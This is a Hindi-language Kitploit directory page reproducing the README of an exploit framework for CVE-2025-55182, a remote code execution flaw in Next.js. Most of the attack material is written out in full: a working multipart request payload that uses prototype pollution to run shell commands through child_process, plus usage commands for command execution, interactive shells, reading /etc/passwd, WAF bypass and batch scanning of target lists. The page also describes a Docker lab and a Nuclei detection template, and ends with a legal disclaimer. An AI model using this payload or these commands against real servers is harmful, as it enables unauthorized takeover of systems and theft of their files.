Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-exploit — React2Shell-Exploit — CVE-2025-55182 के लिए संपूर्ण शोषण फ्रेमवर्क, जिसमें Python एक्सप्लॉइट, Docker असुरक्षित लैब, Burp Suite मैनुअल और स्वचालित शोषण, Nuclei डिटेक्शन टेम्पलेट तथा सत्यापित परीक्षण कार्यप्रवाह शामिल हैं। यह पैठ परीक्षण और शैक्षिक अनुसंधान हेतु विकसित किया गया है। | Kitploit
उपकरण/GitHubGitHub/rubensuxo-eh/react2shell-exploit
भेद्यता स्कैनरशोषण फ्रेमवर्कवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubrubensuxo-eh/react2shell-exploit

react2shell-exploit

React2Shell-Exploit — CVE-2025-55182 के लिए संपूर्ण शोषण फ्रेमवर्क, जिसमें Python एक्सप्लॉइट, Docker असुरक्षित लैब, Burp Suite मैनुअल और स्वचालित शोषण, Nuclei डिटेक्शन टेम्पलेट तथा सत्यापित परीक्षण कार्यप्रवाह शामिल हैं। यह पैठ परीक्षण और शैक्षिक अनुसंधान हेतु विकसित किया गया है।

रिपॉजिटरी देखें
418 महीने पहलेअभी तक समीक्षित नहीं

🐺 React2Shell-Exploit-Kensei

CVE-2025-55182 - Next.js RCE रिमोट कोड निष्पादन

एक्सप्लॉइट फ्रेमवर्क + असुरक्षित लैब + Burp Suite और Nuclei सत्यापन।

सुरक्षा अनुसंधान और पैठ परीक्षण के लिए संपूर्ण एक्सप्लॉइटेशन फ्रेमवर्क और असुरक्षित लैब वातावरण।

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║              🐺 React2Shell-Exploit-Kensei 🐺                 ║
║              CVE-2025-55182 Exploitation Tool                 ║
║                                                               ║
║  Author: Ruben Suxo - Ethical Hacker (kensei)    v2.5.0      ║
╚═══════════════════════════════════════════════════════════════╝

🎯 अवलोकन

React2Shell-Exploit-Kensei, Next.js अनुप्रयोगों में एक गंभीर रिमोट कोड निष्पादन भेद्यता, CVE-2025-55182 का शोषण करने के लिए एक व्यापक टूलकिट है।

इसमें शामिल हैं:

  • 🐍 पायथन एक्सप्लॉइट (स्वचालित + मैनुअल मोड)
  • 🐳 Docker असुरक्षित लैब (Next.js 16.0.6)
  • 🔥 Burp Suite एक्सप्लॉइटेशन टेम्पलेट
  • 🚨 Nuclei डिटेक्शन टेम्पलेट
  • 🧪 सत्यापित टेस्ट केस

प्रभावित संस्करण:

  • Next.js < 16.0.7
  • React 19.0.0

CVSS स्कोर: 10.0 (गंभीर)

✨ विशेषताएं

🔨 एक्सप्लॉइटेशन

✅ स्वचालित एक्सप्लॉइटेशन
✅ इंटरैक्टिव शेल
✅ कमांड निष्पादन
✅ फ़ाइल पठन
✅ WAF बायपास
✅ बैच स्कैनिंग

🧪 लैब वातावरण Docker स्थापना - पूर्वापेक्षाएँ

असुरक्षित लैब चलाने के लिए आपके पास Docker स्थापित होना चाहिए।

प्लेटफ़ॉर्मस्थापना लिंक
Windowshttps://docs.docker.com/desktop/install/windows/
macOShttps://docs.docker.com/desktop/install/mac-install/
Linux

स्थापना सत्यापित करें:

root@kitploit:~
docker --version

📖 दस्तावेज़ीकरण

✅ Burp Suite गाइड
✅ Nuclei टेम्पलेट
✅ संपूर्ण उदाहरण


🚀 त्वरित आरंभ

root@kitploit:~
# 1. Clone
git clone react2shell-exploit
cd react2shell-exploit
chmod +x react2shell-exploit.py

# 2. Start Lab
cd docker
docker build --no-cache -t react2shell-lab .
docker run -d -p 3002:3002 --name react2shell-lab react2shell-lab

# 3. Exploit
python3 react2shell-exploit.py --url http://localhost:3002 --cmd "whoami"

💻 उपयोग उदाहरण

स्कैन

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --scan

कमांड निष्पादित करें

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "id"

इंटरैक्टिव शेल

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --shell

फ़ाइल पढ़ें

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --read /etc/passwd

WAF बायपास

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "whoami" --waf-bypass

बैच स्कैन

root@kitploit:~
python3 react2shell-exploit.py --list targets.txt --scan --threads 20

🔍 मैनुअल एक्सप्लॉइटेशन

Burp Suite

सत्यापित कार्यशील - अनुरोध टेम्पलेट:

root@kitploit:~
POST / HTTP/1.1
Host: target.com:3002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
Content-Length: 734

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami',{timeout:30000}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/exploit?out=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

अपेक्षित प्रतिक्रिया:

root@kitploit:~
"children":["__PAGE__?{\"out\":\"root\"}",{}]

WHOAMI का मैन्युअल परीक्षण: My Screenshot

IFCONFIG का मैन्युअल परीक्षण: My Screenshot

वैकल्पिक स्वचालित पहचान विधियाँ:

  • ✅ Extensibility Helper एक्सटेंशन:
    1. एक्सटेंशन पर जाएं:
    2. "Extensibility Helper" स्थापित करें और उस पर जाएं

My Screenshot

  1. "Bambda Store" पर जाएं
  2. "CVE-2025-55182,CVE-2025-66478 - React2Shell" खोजें

My Screenshot

  1. "import" पर क्लिक करें

My Screenshot

  1. "Audit Selected Items" चलाएं

My Screenshot

My Screenshot

My Screenshot

  1. कस्टम टैब में सत्यापित करें कि "CVE-2025-55182,CVE-2025-66478 - React2Shell" चेक किया गया है My Screenshot
  • ✅ ActiveScan++: स्वचालित पहचान

My Screenshot

Nuclei

सत्यापित कार्यशील:

root@kitploit:~
nuclei -target http://target.com:3002 -t nuclei/CVE-2025-55182.yaml

आउटपुट:

root@kitploit:~
[CVE-2025-55182] [http] [critical] http://target.com:3002/

My Screenshot

🐺 श्रेय

लेखक: Ruben Suxo - एथिकल हैकर (kensei)
संस्करण: 2.5.0
दिनांक: 2025-12-06

अनुसंधान और प्रेरणा

यह परियोजना निम्नलिखित से अनुसंधान और तकनीकों पर आधारित है:

  • assetnote/react2shell-scanner - स्कैनर कार्यान्वयन
  • freeqaz/react2shell - एक्सप्लॉइटेशन तकनीकें
  • whiteov3rflow/CVE-2025-55182-poc - प्रमाण की अवधारणा

भेद्यता खोज

  • Lachlan Davidson (@lachlan2k) - मूल CVE-2025-55182 खोज

⚠️ कानूनी अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए।

अनधिकृत पहुंच अवैध है। केवल उन सिस्टम पर उपयोग करें जिनके मालिक आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।


📄 लाइसेंस

MIT लाइसेंस


🐺 हैक द प्लैनेट - जिम्मेदारी से

केवल शैक्षिक उद्देश्यों के लिए। नैतिक रूप से उपयोग करें।

टूल डाउनलोड करें
https://docs.docker.com/engine/install/